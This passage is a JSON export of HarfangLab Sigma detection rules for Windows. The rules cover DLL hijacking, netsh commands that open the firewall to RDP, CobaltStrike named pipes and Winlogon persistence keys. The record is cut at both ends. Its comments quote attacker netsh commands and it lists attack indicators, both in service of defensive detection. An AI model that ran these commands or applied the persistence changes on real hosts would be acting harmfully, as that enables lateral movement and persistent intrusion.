- '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2097d94f-4a7d-417e-8cb0-063a71e4cd4c",
"rule_name": "DLL Hijacking via ScriptRunner.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ScriptRunner.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "20bddb6e-34a9-4ce0-821d-1a33c767e9a7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078839Z",
"creation_date": "2026-03-23T11:45:34.078841Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078846Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.helpwire.app/blog/enable-remote-desktop-command-line/",
"https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/",
"https://thedfirreport.com/2021/05/12/conti-ransomware/",
"https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior#command-example-8-enable-specific-services",
"https://attack.mitre.org/techniques/T1562/004/",
"https://attack.mitre.org/techniques/T1021/001/"
],
"name": "t1562_004_firewall_allow_rdp.yml",
"content": "title: Remote Desktop Traffic Enabled via netsh\nid: 20bddb6e-34a9-4ce0-821d-1a33c767e9a7\ndescription: |\n Detects a firewall filter modification that allows RDP traffic to pass through.\n Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\n It is recommended to analyze the process responsible for the execution of netsh.exe, to look for other suspicious activities on the host and to investigate subsequent malicious RDP connections to the host.\nreferences:\n - https://www.helpwire.app/blog/enable-remote-desktop-command-line/\n - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n - https://thedfirreport.com/2021/05/12/conti-ransomware/\n - https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior#command-example-8-enable-specific-services\n - https://attack.mitre.org/techniques/T1562/004/\n - https://attack.mitre.org/techniques/T1021/001/\ndate: 2022/12/01\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.004\n - attack.lateral_movement\n - attack.t1021.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_netsh1:\n Image|endswith: '\\netsh.exe'\n # netsh firewall set service RemoteDesktop enable\n # netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes\n CommandLine|contains|all:\n - 'firewall'\n - 'set'\n - 'remote'\n - 'desktop'\n - 'enable'\n selection_netsh2:\n Image|endswith: '\\netsh.exe'\n # netsh advfirewall firewall add rule name=\"rdp\" dir=in protocol=tcp localport=3389 action=allow\n CommandLine|contains|all:\n - 'firewall'\n - 'add rule'\n - 'rdp'\n - 'allow'\n - '3389'\n\n # Exclusion for firewall activation\n # netsh advfirewall firewall set rule group=\"remote desktop\" new enable=no\n filter_disable:\n CommandLine|contains|all:\n - 'set rule'\n - 'enable'\n - 'no'\n\n exclusion_open_nebula:\n Ancestors|contains:\n - '|?:\\Program Files\\OpenNebula\\rhsrvany.exe|'\n - '|?:\\Program Files (x86)\\OpenNebula\\rhsrvany.exe|'\n\n # https://learn.microsoft.com/fr-fr/windows-hardware/manufacture/desktop/add-a-custom-script-to-windows-setup?view=windows-11\n exclusion_setupcomplete:\n ParentCommandLine|endswith: '\\cmd.exe /c ?:\\Windows\\Setup\\Scripts\\SetupComplete.cmd'\n\n exclusion_siemens:\n ProcessGrandparentImage: '?:\\Windows\\Temp\\TSplusInstaller\\Setup-Siemens.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'TSplus SAS'\n\n exclusion_medulla:\n CommandLine|startswith: 'netsh advfirewall firewall add rule name=Remote Desktop for Medulla'\n\n exclusion_syngo:\n ParentCommandLine|contains:\n - '\\syngo_delta_pkg\\setup\\FeatureInstallServer.bat'\n - '\\Program Files\\Siemens\\syngo\\bin\\Common\\'\n\n exclusion_TSplus_AdminTool:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\TSplus\\UserDesktop\\files\\AdminTool.exe'\n\n exclusion_svcr:\n ProcessGrandparentImage|endswith: '\\svcr.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature|contains: 'Remote Access World SAS'\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "20bddb6e-34a9-4ce0-821d-1a33c767e9a7",
"rule_name": "Remote Desktop Traffic Enabled via netsh",
"rule_description": "Detects a firewall filter modification that allows RDP traffic to pass through.\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\nIt is recommended to analyze the process responsible for the execution of netsh.exe, to look for other suspicious activities on the host and to investigate subsequent malicious RDP connections to the host.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.001",
"attack.t1562.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "20bf9b2e-173e-4162-b9c8-d50e1b4b38ff",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081735Z",
"creation_date": "2026-03-23T11:45:34.081737Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081741Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mdeserver.yml",
"content": "title: DLL Hijacking via mdeserver.exe\nid: 20bf9b2e-173e-4162-b9c8-d50e1b4b38ff\ndescription: |\n Detects potential Windows DLL Hijacking via mdeserver.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mdeserver.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d3d11.dll'\n - '\\dxgi.dll'\n - '\\MFPlat.DLL'\n - '\\RTWorkQ.DLL'\n - '\\SspiCli.dll'\n - '\\winmde.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "20bf9b2e-173e-4162-b9c8-d50e1b4b38ff",
"rule_name": "DLL Hijacking via mdeserver.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mdeserver.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "20cfd136-f946-4130-a522-6597ff877ac3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072975Z",
"creation_date": "2026-03-23T11:45:34.072977Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072981Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/",
"https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575",
"https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/",
"https://medium.com/falconforce/falconfriday-suspicious-named-pipe-events-0xff1b-fe475d7ebd8",
"https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752",
"https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py",
"https://attack.mitre.org/techniques/T1021/002/"
],
"name": "t1021_002_custom_cobaltstrike_named_pipes_connected.yml",
"content": "title: Custom CobaltStrike Named Pipe Connected\nid: 20cfd136-f946-4130-a522-6597ff877ac3\ndescription: |\n Detects the connection to a Named Pipe pertaining to the CobaltStrike framework.\n These are custom CobaltStrike Named Pipe as seen in previous attacks.\n CobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\n It is recommended to investigate the process that created the named pipe to determine its legitimacy.\nreferences:\n - https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/\n - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575\n - https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/\n - https://medium.com/falconforce/falconfriday-suspicious-named-pipe-events-0xff1b-fe475d7ebd8\n - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752\n - https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2022/07/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName:\n - '\\mojo.5688.8052.183894939787088877*'\n - '\\mojo.5688.8052.35780273329370473*'\n - '\\scerpc_*'\n - '\\win_svc*'\n - '\\demoagent_11*'\n - '\\demoagent_22*'\n - '\\Winsock2\\CatalogChangeListener-*-0,'\n - '\\wkssvc_??'\n - '\\ntsvcs??'\n - '\\DserNamePipe??'\n - '\\PGMessagePipe??'\n - '\\SearchTextHarvester??'\n - '\\mypipe-f??'\n - '\\mypipe-h??'\n - '\\windows.update.manager??'\n - '\\windows.update.manager???'\n - '\\MsFteWds??'\n - '\\f4c3??'\n - '\\f53f??'\n - '\\fullduplex_??'\n - '\\msrpc_????'\n - '\\win\\msrpc_??'\n - '\\rpc_??'\n - '\\spoolss_??'\n # https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py\n - '\\ProtectionManager_????_??'\n - '\\ProtectionManager_??'\n - '\\Winsock2\\\\CatalogChangeListener-???????-1'\n - '\\Winsock2\\\\CatalogChangeListener-??-??'\n - '\\Spool\\\\pipe_????_??'\n - '\\Spool\\\\pipe_??'\n - '\\WkSvcPipeMgr_??????'\n - '\\WkSvcPipeMgr_??'\n - '\\NetClient_??????'\n - '\\NetClient_??'\n - '\\RPC_??????'\n - '\\WiFiNetMgr????_??'\n - '\\WiFiNetMgr_??'\n - '\\AuthPipeD_??'\n\n exclusion_trendmicro:\n PipeName:\n - '\\f4c3??'\n - '\\f53f??'\n ProcessImage:\n - '?:\\Program Files\\Trend Micro\\\\*'\n - '?:\\Program Files (x86)\\Trend Micro\\\\*'\n ProcessSigned: 'true'\n ProcessSignature: 'Trend Micro, Inc.'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "20cfd136-f946-4130-a522-6597ff877ac3",
"rule_name": "Custom CobaltStrike Named Pipe Connected",
"rule_description": "Detects the connection to a Named Pipe pertaining to the CobaltStrike framework.\nThese are custom CobaltStrike Named Pipe as seen in previous attacks.\nCobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\nIt is recommended to investigate the process that created the named pipe to determine its legitimacy.\n",
"rule_creation_date": "2022-07-08",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "20feacae-9a99-4ce6-8f8c-c02176cb730a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620673Z",
"creation_date": "2026-03-23T11:45:34.620675Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620680Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.ired.team/offensive-security/persistence/windows-logon-helper",
"https://persistence-info.github.io/Data/mpnotify.html",
"https://twitter.com/0gtweet/status/1548604288611614725",
"https://attack.mitre.org/techniques/T1547/004/"
],
"name": "t1547_004_persistence_winlogon_helper.yml",
"content": "title: Winlogon Helper DLL Installed\nid: 20feacae-9a99-4ce6-8f8c-c02176cb730a\ndescription: |\n Detects a change of the Winlogon configuration via registry modification.\n Attackers may abuse features of Winlogon to execute DLLs and/or executables at user logon.\n It is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\nreferences:\n - https://www.ired.team/offensive-security/persistence/windows-logon-helper\n - https://persistence-info.github.io/Data/mpnotify.html\n - https://twitter.com/0gtweet/status/1548604288611614725\n - https://attack.mitre.org/techniques/T1547/004/\ndate: 2020/09/24\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1547.004\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_winlogon:\n EventType: SetValue\n TargetObject|endswith:\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n\n selection_notify:\n EventType: SetValue\n TargetObject|endswith:\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\\\*\\DllName'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\\\*\\DllName'\n\n # Detects suspicious persistence by creating the mpnotify value.\n # The executable will be loaded by the winlogon.exe process at user logon.\n # The new process will be terminated after a timeout of 30 seconds.\n selection_mpnotify:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\mpnotify'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_userinit:\n TargetObject|endswith:\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n Details:\n # cannot use *\\userinit.exe because one could add its persistence before the userinit entry and we would miss it\n - '?:\\windows\\system32\\userinit.exe,'\n - '?:\\windows\\system32\\userinit.exe'\n - '?:\\windows\\syswow64\\userinit.exe,'\n - '?:\\windows\\syswow64\\userinit.exe'\n - 'userinit.exe'\n - 'userinit.exe,'\n - '?:\\windows\\system32\\kusrinit.exe,' # DELL/Kace agent\n - '?:\\WINDOWS\\system32\\userinit.exe,?:\\windows\\system32\\KUsrInit.exe,'\n - '?:\\Windows\\system32\\Cliaca2kp.exe,?:\\Windows\\System32\\KUsrInit.exe' # IACA, DELL/Kace agent\n - '?:\\windows\\system32\\userinit.exe,\"?:\\program files\\vmware\\vmware view\\agent\\bin\\wssm.exe\",' # VMWare view agent\n - '?:\\windows\\system32\\userinit.exe,\"?:\\program files\\unidesk\\layering services\\layerinfo.exe\",' # CITRIX app layering\n - '?:\\Windows\\system32\\userinit.exe,?:\\Program Files (x86)\\HP\\HP ProtectTools Security Manager\\Bin\\DPAgent.exe,' # HP ProtectTools agent\n - '?:\\Windows\\system32\\userinit.exe,?:\\Program Files (x86)\\Hewlett-Packard\\HP ProtectTools Security Manager\\Bin\\DPAgent.exe,'\n - '?:\\WINDOWS\\system32\\userinit.exe,\"?:\\Program Files (x86)\\Avencis\\SSOX\\SessionManager+.exe\"' # Avencis\n\n exclusion_shell_explorer:\n TargetObject|endswith:\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details: 'explorer.exe'\n\n exclusion_sccertprop:\n TargetObject: '*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\ScCertProp\\DllName'\n Details|contains: 'wlnotify.dll'\n\n exclusion_logmein_gotoassist:\n TargetObject:\n - '*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\GoToAssist Express Customer\\DLLName'\n - '*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\GoToAssist\\DLLName'\n Details|endswith:\n - 'g2ax_winlogonx64.dll'\n - 'g2awinlogon_x64.dll'\n # FIXME: waiting for agent in production to support those fields\n # ProcessSignature: 'LogMeIn, Inc.'\n # ProcessSigned: 'true'\n\n exclusion_citrix:\n TargetObject: '*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\MetaFrame\\DLLName'\n Details: 'ctxnotif.dll'\n exclusion_citrix_icaservice:\n TargetObject: '*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\cpwswlx\\DLLName'\n Details:\n - '?:\\program files\\citrix\\icaservice\\cpwswlx64.dll'\n - '?:\\Program Files\\Citrix\\HDX\\bin\\CpWsWlx64.dll'\n exclusion_citrix_selfservice:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\shell'\n Details: '?:\\Program Files (x86)\\Citrix\\ICA Client\\SelfServicePlugin\\selfservice.exe'\n\n exclusion_userlock_agent:\n TargetObject|endswith: '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n Details: '?:\\WINDOWS\\SYSWOW64\\ULAGENTEXE.EXE,'\n\n exclusion_zonecentral:\n Image: '?:\\Program Files\\Prim?x\\ZoneCentral\\zcs.exe'\n Details: '*zcuserinit.exe*'\n\n exclusion_igfxcui:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\igfxcui\\DLLName'\n Details: 'igfxdev.dll'\n\n exclusion_logishrd:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\LBTWlgn\\DLLName'\n Details|contains: '?:\\program files\\common files\\logishrd\\bluetooth\\LBTWlgn.dll'\n\n exclusion_ccnotify:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\ccnotify\\DLLName'\n Details: 'ccnotify.dll'\n\n exclusion_novell:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\LCredMgr\\DLLName'\n Details: '?:\\Program Files\\Novell\\CASA\\bin\\lcredmgr.dll'\n\n exclusion_zencredmanager:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\ZenCredManager\\DLLName'\n Details: 'ZenCredManager.dll'\n\n # https://tsplus.net/fr/\n exclusion_tsplus:\n ProcessCommandLine:\n - '?:\\wsession\\svcr.exe logonsession.bin ?:\\wsession\\logonsession.exe'\n - '?:\\Program Files (x86)\\TSplus\\UserDesktop\\files\\APSC.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details: '?:\\ProgramData\\alternateshell.exe'\n\n exclusion_displaynote_technologies:\n ProcessImage: '?:\\Program Files (x86)\\DisplayNoteTechnologies\\Launcher\\KioskStarter.exe'\n Details: '?:\\Program Files (x86)\\DisplayNoteTechnologies\\Launcher\\KioskStarter.exe'\n\n # Windows in kiosk mode\n exclusion_customshellhost:\n ProcessCommandLine|contains: '?:\\windows\\system32\\svchost.exe -k AssignedAccessManagerSvc'\n Details: 'customshellhost.exe'\n\n exclusion_kiosk:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details: 'conhost.exe --headless pwsh -WindowStyle hidden -File \"?:\\Windows\\System32\\Kiosk.ps1\"'\n\n exclusion_isl_online:\n ProcessImage:\n - '?:\\Program Files (x86)\\ISL Online Cache\\ISL Restart\\s_?\\ISLLightService.exe'\n - '?:\\Program Files (x86)\\ISL Online\\ISL Restart\\s_?\\ISLLightService.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\ISL Online Cache\\ISL Restart\\s_?\\ISLLightService.exe'\n Details:\n - '?:\\Program Files (x86)\\ISL Online Cache\\ISL Restart\\s_?\\isl_notify64.dll'\n - '?:\\Program Files (x86)\\ISL Online\\ISL Restart\\s_?\\isl_notify64.dll'\n - '?:\\Users\\\\*\\AppData\\Local\\ISL Online Cache\\ISL Restart\\s_?\\isl_notify64.dll'\n\n exclusion_archimed:\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details: '?:\\Program Files\\Archimed\\shell\\unishell.exe'\n\n exclusion_crews:\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details: 'CrewsDesk.exe'\n ProcessImage: '*\\Resa Crews Cupps\\CrewsCupps.exe'\n\n exclusion_omniware:\n ProcessImage|endswith: '\\APSC.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'JWTS SASU'\n - 'Remote Access World SAS'\n Details|startswith: '?:\\ProgramData\\alternateshell.exe'\n\n exclusion_ivanti:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n Details|contains:\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pwrstart.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n\n exclusion_windowssetup:\n Image:\n - '?:\\$WINDOWS.~BT\\Sources\\setupplatform.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_userlock:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n Details|contains: '?:\\WINDOWS\\SYSWOW64\\ULAGENTEXE.EXE'\n\n exclusion_kerberos:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\MIT_KFW\\DLLName'\n Details: '?:\\WINDOWS\\system32\\kfwlogon.dll'\n\n exclusion_wkplogin:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows 